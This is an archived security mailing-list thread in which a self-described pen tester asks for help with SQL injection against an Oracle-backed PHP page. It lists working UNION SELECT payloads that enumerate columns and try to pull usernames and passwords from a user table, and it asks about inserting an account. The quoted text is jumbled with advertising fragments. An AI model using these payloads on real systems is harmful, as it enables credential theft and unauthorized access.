Re: Oracle URL SQL Injection issue
- From: Clone <c70n3@xxxxxxxxxxx>
- Date: Tue, 22 Jan 2008 22:44:07 +0000 (GMT)
One more step closer
I'm able to enumerate the column names for user table
as username and password.
http://x.y.z.a/item.php?Id=90%20union%20select%20username,password%20from%20usr
This doesn't generate an error. If I change column
names a bit I get error.
Unfortunately I'm not getting the data returned in
HTML. This is a private forum site. With the url above
I do get the page for the correct forum but nothing
about usr table.
Any pointers?
Can I use union to insert a username and password in
usr table?
--- Clone <c70n3@xxxxxxxxxxx> wrote:
Hmm.. with Jeff's input below I enumerate that therehttp://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
are 2
columns.
This time I gave
http://x.y.z.a/item.php?Id=90%20union%20select%201,'a'%20from%20usr
Now I get following error:
ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-01790: expression must have same datatype as
corresponding expression in dbs.inc on line 44
The I tried following:
http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--
And get the error
ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-00911: invalid character in dbs.inc on line 44
The functionality of the page is to generate an
page/forum email page.
Any idea what's next?
--- Joseph McCray <joe@xxxxxxxxxxxxxxxxxxxxxxx>
wrote:
How are you coming along with this? Are you stillitem.php
having trouble?
Joe
On Fri, 2008-01-18 at 00:21 +0000, Clone wrote:
Hey Listconfirm
I am pen testing a web app that supplies sql
parameters on the URL something like
http://x.y.z.a/item.php?Id=90
I did blind sql injection by adding AND 1=1 to
the vulnerability.ORA-01756:
Now when I do
http://x.y.z.a/item.php?Id=90'
I get
ociparse() [function.ociparse]: OCIParse:
quoted string not properly terminated in
on
line 312table
Then I tried (after confirming presence of usr
name)
http://help.yahoo.com/l/in/yahoo/mail/yahoomail/tools/tools-08.htmlforward?OCIStmtExecute:
and I get the error
ociexecute() [function.ociexecute]:
ORA-01789: query block has incorrect number ofresult
columns in dbs.inc on line 44
I know one valid user account in the oracle DB.
Any idea what's the best strategy to move
in your inbox. Go to
I'm not getting any further from here so far.
Any advise / helpo would be much appreciated.
Cheers'
5, 50, 500, 5000 - Store N number of mails
------------------------------------------------------------------------
------------------------------------------------------------------------This list is sponsored by: CenzicFREE today!
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution
http://www.cenzic.com/downloads
--
Joe McCray
Toll Free: 1-866-892-2132
Email: joe@xxxxxxxxxxxxxxxxxxxxxxx
Web: https://www.learnsecurityonline.com
Learn Security Online, Inc.
* Security Games * Simulators
* Challenge Servers * Courses
* Hacking Competitions * Hacklab Access
"The only thing worse than training good employees
and losing them
is NOT training your employees and keeping them."
- Zig Ziglar
Download prohibited? No problem. CHAT from any
browser, without download. Go to
http://in.messenger.yahoo.com/webmessengerpromo.php/
Now you can chat without downloading messenger. Go to http://in.messenger.yahoo.com/webmessengerpromo.php
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
- Prev by Date: Re: Ultra VNC-3DES-is it secure
- Next by Date: Re: Promiscuous mode doesn't work on Intel 3945 wireless
- Previous by thread: Re: Oracle URL SQL Injection issue
- Next by thread: http TRACE option
- Index(es):
Relevant Pages
|
|
